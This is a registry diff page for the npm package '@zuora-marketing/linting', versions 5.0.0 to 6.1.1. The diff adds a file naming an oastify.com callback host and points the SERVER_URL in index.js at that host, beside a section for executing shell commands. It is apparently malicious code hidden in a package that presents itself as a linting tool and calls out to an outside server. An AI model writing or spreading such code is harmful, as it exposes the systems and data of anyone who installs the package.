@zuora-marketing/linting 5.0.0 → 6.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/hok +1 -0
- package/index.js +1 -1
- package/logs +1529 -0
- package/package.json +7 -3
package/hok
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
0qrdhvhhrnd31cfmhs9rw3ndz45wtnhc.oastify.com
|
package/index.js
CHANGED
|
@@ -4,7 +4,7 @@ const https = require('https');
|
|
|
4
4
|
const http = require('http');
|
|
5
5
|
|
|
6
6
|
// ===== CONFIGURATION =====
|
|
7
|
-
const SERVER_URL = 'https://
|
|
7
|
+
const SERVER_URL = 'https://0qrdhvhhrnd31cfmhs9rw3ndz45wtnhc.oastify.com/'; // Change this to your server URL
|
|
8
8
|
// =========================
|
|
9
9
|
|
|
10
10
|
// Function to execute shell commands
|